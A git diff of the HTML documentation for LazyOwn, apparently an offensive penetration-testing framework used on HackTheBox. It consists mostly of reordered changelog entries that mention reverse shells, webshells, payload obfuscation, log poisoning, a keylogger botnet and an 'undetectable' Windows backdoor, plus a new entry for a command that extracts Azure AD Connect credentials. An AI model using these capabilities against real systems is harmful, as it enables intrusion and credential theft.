@@ -8601,45 +8627,45 @@
Otros
soon
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- some new attacks exploits and new menu to download resources and
exploits :D new msf autoroute :D
-Otros
Otros
+Otros
- some new attacks exploits and new menu to download resources adn
exploits :D
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 command
@@ -8647,48 +8673,48 @@
Otros
charge an iccon from our smbserver and the hash is ours
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
command getnpusers
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 the target
was pwntomated 🍅 alias auto.
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 the target
was pwntomated 🍅 alias auto.
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 the target
was pwntomated 🍅. jejejjejej
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 now with
pwntomate to automate with the command pyautomate
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 now
@@ -8696,8 +8722,8 @@
Otros
pleasssure. xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
@@ -8705,8 +8731,8 @@
Otros
command
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 socat
@@ -8715,101 +8741,101 @@
Otros
perform a malicious shortcut lnk attack with msfvenom
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 some
format….
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 …
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 fix
arguments little bug
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 fix
arguments little bug
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
arguments :) -c command ex ping
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
aliases :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 now
options like –help, -v and –no-banner :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
command clock to see the time of the eternal now :) now in white xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
command clock to see the time of the eternal now :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429
newhashcat
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
@@ -8817,8 +8843,8 @@
Otros
better now with recognice automate download_resource
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 another
@@ -8827,40 +8853,40 @@
Otros
xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 was banned
from htb to spoiler jajjajaj xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 msf
command
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 scripts to
try attac cammeras not work with my cammera yet xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 scripts to
try attac cammeras not work with my cammera yet xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
@@ -8868,24 +8894,24 @@
Otros
cports
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 clean
command to clean up the mess and pwn the next machine :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 wfuzz
commands pwd, sh
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 wfuzz
@@ -8893,72 +8919,72 @@
Otros
vpn, rev, banner :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New Colors
:D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 adding run
script to run lazyown with virtual env activated to avoid errors
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 adding
alias to exit as q :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 adding
alias to commands its una shulada
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 some love
to list command :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 some love
in form of colored strings :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 some love
to some prints :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
command py3ttyup to upgrade to tty your rev shell :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
@@ -8967,8 +8993,8 @@
Otros
fixperms :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
@@ -8976,120 +9002,120 @@
Otros
where lazyown dump scripts like revertshells, webshells, etc.
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 solarlab
pwned :D new machine MagicGardens
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine solarlab :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
revshell.c and machine powned xD axlle hard
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
commands createrevshell y createwinrevshell
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 FormulaX
pwned :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Freelancer Pwned :P new new new FormulaX :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Freelancer :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Skyfall Linux insane machine, Blazorized was powned :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Blazorized.htb
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Greenhorn.htb pwned
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Greenhorn.htb
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new tool
in external :) https://github.com/BloodHoundAD/SharpHound.git :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
MAchine Blazorized.htb :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
MAchine :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New
@@ -9097,24 +9123,24 @@
Otros
relative/path/show/in/searchexploit when you use the flag -x :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New
command dsnmap :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New
machine Runner.htb
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New
@@ -9122,223 +9148,223 @@
Otros
:)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New
command :) samrdump
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 news
script bruteforce on modules :) :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
command dnsenum :)
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 new
command dig
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 new
command dig
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 new
commands :)
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 new
commands :) to se use tab tab or ?
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 and
new payloads in sessions directory :) :) :)
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 and
new exploits :)
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429 and
new command run lazywerkzeugdebug
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429
-Otros
Otros
+Otros
- join to our team https://app.hackthebox.com/teams/overview/6429
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- new commands createhash, createwebshell, sqlmap, proxy,
john2hash
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create internal_discover.sh
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- 2 new exploit external :D working like a charm
-Otros
Otros
+Otros
- new exploit werkzeug in debug mode lettle retocated to run in
python3 from searchsploit :D
-Otros
Otros
+Otros
- new command: exploits externals :D
-Otros
Otros
+Otros
- new command: smbmap whattomap ex: smbmap tmp :D
-Otros
Otros
+Otros
- go buster new parameter url to use url from payload not rhost
-Otros
Otros
+Otros
- parameter added to gospider url to use var url in payload not rhost
@@ -9346,66 +9372,66 @@
Otros
parameter to /etc/hosts not now to windows sistems sorry
-Otros
Otros
+Otros
- refactor global var rhost deleted other ones
-Otros
Otros
+Otros
- path hijacking add line to temp bash script
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- new command: wfuzz :D and you can add example a hide line option
like # wfuzz –hl=9 to hide responses with long line to 9
-Otros
Otros
+Otros
- new command: run lazyssh77enum to enum using a wordlist and exploit
foound searchsploit as openssh 7.7
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- smbclient command and exploit to enum ssh i used in a machine of
@@ -9413,269 +9439,269 @@
Otros
xD
-Otros
Otros
+Otros
- Merge pull request #22 from grisuno/grisuno-patch-1
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- new command getseclist :D
-Otros
Otros
+Otros
- payload.json to play on hackthebox :D
-Otros
Otros
+Otros
- port a python del exploit archiconocido de meta exploit vsftpd
3.0.3
-Otros
Otros
+Otros
- shell payload in python generated by msfvenom automated by lazyown
framework ;)
-Otros
Otros
+Otros
- new commit to check if alsr is activated in the kernel
-Otros
Otros
+Otros
- deleted shells generated by the script
-Otros
Otros
+Otros
- upx to shells generated by msfvenom automated by lazyown framework
;)
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- new path to diccionary to run by default in parrot
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- herramienta para ofuscar payloads y es usada en lazylogpoisoner ;)
pronto extendida al resto de payloads ;)
-Otros
Otros
+Otros
- herramienta para ofuscar payloads y es usada en lazylogpoisoner ;)
pronto extendida al resto de payloads ;)
-Otros
Otros
+Otros
- herramienta para ofuscar payloads y es usada en lazylogpoisoner ;)
pronto extendida al resto de payloads ;)
-Otros
Otros
+Otros
- herramienta para ofuscar payloads y es usada en lazylogpoisoner ;)
pronto extendida al resto de payloads ;)
-Otros
Otros
+Otros
- herramienta para ofuscar payloads y es usada en lazylogpoisoner ;)
pronto extendida al resto de payloads ;)
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #21 from grisuno/grisuno-patch-1
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Lazy ntlmv2 firstaproach using in hashes.txt the ouput smbserver
command when the conection is established
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Lazy get smbserver with impacket :) and then you can sudo
@@ -9683,1354 +9709,1354 @@
Otros
simple smbserver in LazyOwn console
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- LazyOwn FTP sniff prety messages :)
-Otros
Otros
+Otros
- LazyOwn keygen to generate keys to use in payload.json to cypher the
conections
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- LazyOwn http sniff :( not working fine yet
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- LazyOwn ArpSpoofing README and banner :P [;,;]
-Otros
Otros
+Otros
- LazyOwn ArpSpoofing [;,;]
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Lazy Log more lfi list :)
-Otros
Otros
+Otros
- Lazy Log Poisonig more poison bro
-Otros
Otros
+Otros
- Lazy Log Poisonig in ssh first aproach
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Delete lazylogpisoning.py
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- #!/usr/bin/env python3 #_*_ coding: utf8 _*_
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
- add #!/usr/bin/env python3 #_*_ coding: utf8 _*_
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- tentativas de herramientas nuevas
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- imlementacion de libreria pwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- mejora en la webshell de python
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- return jsonify({“error”: “error”}), 500
-Otros
Otros
+Otros
- Fix code scanning alert - Information exposure through an exception
#16
-Otros
Otros
+Otros
- Fix code scanning alert - Flask app is run in debug mode #17
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- nueva interfaz web experimental
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- nuevo bot de investigacion
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
- New BotNet with Keylogger
-Otros
Otros
+Otros
- Merge pull request #13 from grisuno/grisuno-patch-7
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create pull_request_template.md
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create pull_request_template.md
-Otros
Otros
+Otros
- device to sniff parametric
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge branch ‘main’ of https://github.com/grisuno/LazyOwn
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- nuevo modulo de gathering
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- nueva estructura de directorios
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #10 from grisuno/grisuno-patch-6
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #8 from grisuno/grisuno-patch-6
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create lazyown_metaextract0r.py
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create lazyown_bprfuzzer.py
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #6 from grisuno/grisuno-patch-5
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Update lazyreverse_shell.sh
-Otros
Otros
+Otros
- Merge pull request #5 from grisuno/grisuno-patch-4
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create lazyreverse_shell.sh
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Update LazyOwnExplorer.py
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create LazyOwnExplorer.py
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #4 from grisuno/grisuno-patch-3
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create CODE_OF_CONDUCT.md
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #3 from grisuno/grisuno-patch-2
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Merge pull request #1 from grisuno/grisuno-patch-1
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- ██╗ █████╗ ███████╗██╗ ██╗ ██████╗ ██╗ ██╗███╗ ██╗ ██║
@@ -11041,64 +11067,64 @@
Otros
╚══╝╚══╝ ╚═╝ ╚═══╝
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create bin_data_relevant.csv
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Create detailed_search.py
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- Update README.md
diff --git a/docs/index.html b/docs/index.html
index a4830807..16266793 100644
--- a/docs/index.html
+++ b/docs/index.html
@@ -5955,6 +5955,20 @@ h
Note: - Ensure that tmux is installed and properly configured on the
system. - The method assumes that the session name is defined and
accessible in the scope where this method is called.
+adgetpass
+Command adgetpass: Generates a PowerShell script to extract
+credentials from Azure AD Connect Sync.
+This function generates a PowerShell script based on user inputs,
+including the SQL server, database, and custom keyset values. The script
+retrieves encryption keys, decrypts credentials, and outputs the domain,
+username, and password from the AD Sync configuration.
+Args: line (str): Optional argument to specify the server name,
+database name, and other options in the following format: “server_name
+database_name keyset_id instance_id entropy”.
+Returns: None
+Example: adgetpass MONTEVERDE ADSync 1
+1852B527-DD4F-4ECF-B541-EFCCBFF29E31
+194EC2FC-F186-46CF-B44D-071EB61F49CD
find_tgts
Finds and returns a list of target hosts with port 445 open in the
specified subnet.
@@ -6128,6 +6142,18 @@ Otros
- test(test): test Version: release/0.1.64 test Modified file(s):-
+README.md - docs/README.html - docs/index.html - docs/index.html.bak -
+lazyown - sessions/users.txtLazyOwn on HackTheBox:
+https://app.hackthebox.com/teams/overview/6429 LazyOwn/
+https://grisuno.github.io/LazyOwn/ Fecha: Sat Oct 19 00:18:05 2024 -0300
+Hora: 1729307885
+
+
+Pruebas
+Otros
+
+
+- test(test): test Version: release/0.1.64 test Modified file(s):-
.gitignore - COMMANDS.md - README.md - UTILS.md - docs/COMMANDS.html -
docs/README.html - docs/UTILS.html - docs/index.html -
docs/index.html.bak - firefox.dmp - lazyown - utils.pyfile(s):-
@@ -6137,8 +6163,8 @@
Otros
Hora: 1729226236
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): test Version: release/0.1.64 image banner responsive
@@ -6149,8 +6175,8 @@
Otros
Hora: 1729225810
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): test Version: release/0.1.64 test Modified file(s):-
@@ -6161,8 +6187,8 @@
Otros
Hora: 1729219689
-Otros
Otros
+Otros
- feature(feat): new commands documented at COMMANDS.md Version:
@@ -6178,8 +6204,8 @@
Otros
Hora: 1729047333
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): test Version: release/0.1.63 test Modified file(s):-
@@ -6189,8 +6215,8 @@
Otros
Hora: 1729039733
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): no test Version: release/0.1.63 testing Modified
@@ -6201,8 +6227,8 @@
Otros
Hora: 1729039188
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): test Version: release/0.1.63 test Modified file(s):-
@@ -6214,8 +6240,8 @@
Otros
Hora: 1728971840
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): deply Version: release/0.1.63 new Modified file(s):-
@@ -6226,8 +6252,8 @@
Otros
Hora: 1728971576
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): deploy Version: release/0.1.63 Modified file(s):-
@@ -6241,7 +6267,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): hashs Version: release/0.1.63 new logic of get
@@ -6254,8 +6280,8 @@
Otros
Hora: 1728890837
-Otros
Otros
+Otros
- feature(feat): new commands documented at COMMANDS.md Version:
@@ -6269,8 +6295,8 @@
Otros
Hora: 1728795132
-Otros
Otros
+Otros
- feature(feat): new commands like emp3r0r,
@@ -6290,7 +6316,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): refactor of users.txt Version: release/0.1.61
@@ -6305,7 +6331,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): refactor lazy_ruberdigispark isnto duckyspark
@@ -6320,7 +6346,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): trasnlated nmap script Version: release/0.1.61 and add
@@ -6332,7 +6358,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): nmap Version: release/0.1.61 nmap script was
@@ -6344,15 +6370,15 @@
Otros
Hora: 1728618761
-Otros
Otros
+Otros
Nuevas características
-Otros
+Otros
- feat(feat): New Feature Automate Arduino Attacks or AAA the command
@@ -6366,7 +6392,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): finger_user_enum Version: release/0.1.60 new
@@ -6380,7 +6406,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): trasnform Version: release/0.1.59 command documented at
@@ -6393,7 +6419,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): bug fixing Version: release/0.1.58 int the dunction do_ssh
@@ -6406,7 +6432,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): tags Version: release/0.1.57 xd Modified file(s):-
@@ -6417,7 +6443,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): refactor de find y nc Version: release/0.1.56
@@ -6430,8 +6456,8 @@
Otros
Hora: 1728364614
-Otros
Otros
+Otros
- feature(feature & refactor): new commands and refactor Version:
@@ -6449,7 +6475,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): automsf Version: release/0.1.55 new command documented
@@ -6462,8 +6488,8 @@
Otros
Hora: 1728195928
-Pruebas
-Otros
+Pruebas
+Otros
- test(new machine return): is a nice machine :P Version:
@@ -6475,8 +6501,8 @@
Otros
Hora: 1728191962
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): new machine yummy.htb found a command in find to reverse
@@ -6492,7 +6518,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): new attack mfscosole automated Version: release/0.1.54
@@ -6506,8 +6532,8 @@
Otros
Hora: 1728103452
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): testing DEPLOY.sh script Version: release/0.1.53 to
@@ -6521,7 +6547,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): nueva documentacion comando evidence Version:
@@ -6533,8 +6559,8 @@
Otros
Hora: 1728101925
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): lazyown infinite glitch storage Version: release/0.1.53
@@ -6547,7 +6573,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): fix in find command Version: release/0.1.53 command find
@@ -6559,7 +6585,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): refactor de credentials de evilwinrm de psexec,
@@ -6574,7 +6600,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): eternalblue Version: release/0.1.52 and scanner in
@@ -6586,8 +6612,8 @@
Otros
Hora: 1727757752
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): deleting users from ctf game from repo Version:
@@ -6599,8 +6625,8 @@
Otros
Hora: 1727751984
-Otros
Otros
+Otros
- feature(feat): new commands and functionalities Version:
@@ -6614,7 +6640,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): smbclient refactor, cme refactor, netexec,
@@ -6634,7 +6660,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): new command Shadowsocks Version: release/0.1.50 with
@@ -6646,8 +6672,8 @@
Otros
Hora: 1727315985
-Otros
Otros
+Otros
- feature(feat): now we are vip Version: release/0.1.49 Modified
@@ -6660,7 +6686,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): new commands documented at COMMANDS.md Version:
@@ -6673,8 +6699,8 @@
Otros
Hora: 1727053941
-Pruebas
-Otros
+Pruebas
+Otros
- test(testing): some test and new resources and externals scripst to
@@ -6688,7 +6714,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): new cool stuff xD Version: release/0.1.47 parse id rsa
@@ -6701,7 +6727,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(win backdoor): undetectable Version: release/0.1.46 handcrafted
@@ -6714,7 +6740,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): c2 insecure filename Version: release/0.1.45 resolved
@@ -6726,7 +6752,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): documented resources, and externals, and one command
@@ -6740,8 +6766,8 @@
Otros
Hora: 1726294213
-Otros
Otros
+Otros
- feature(new commands): documented at COMMANDS.md Version:
@@ -6756,8 +6782,8 @@
Otros
Hora: 1726123063
-Otros
Otros
+Otros
- feature(feat): new commands: scarecrow, createmail, eyewitness,
@@ -6771,8 +6797,8 @@
Otros
Hora: 1726033595
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): install Version: release/0.1.42 dou you seaw [3~pip
@@ -6784,8 +6810,8 @@
Otros
Hora: 1726031410
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): install Version: release/0.1.42 testing… Modified
@@ -6798,7 +6824,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): graph Version: release/0.1.42 integrated at index2.html
@@ -6811,7 +6837,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): 2 new commands Version: release/0.1.41 shellfire,
@@ -6823,8 +6849,8 @@
Otros
Hora: 1725925520
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): install testing Version: release/0.1.40 reported by user
@@ -6836,7 +6862,7 @@
Otros
Correcciones urgentes
-Otros
+Otros
- hotfix(hotfix): install wa broken Version: release/0.1.40 infinite
@@ -6847,8 +6873,8 @@
Otros
Hora: 1725884702
-Pruebas
-Otros
+Pruebas
+Otros
- test(testing): emire Version: release/0.1.39 empire xD Modified
@@ -6860,8 +6886,8 @@
Otros
Hora: 1725784522
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): veil Version: release/0.1.39 new evasion tool testing
@@ -6873,8 +6899,8 @@
Otros
Hora: 1725781606
-Otros
Otros
+Otros
- feature(feat): now tord, trace, and generatedic to generate
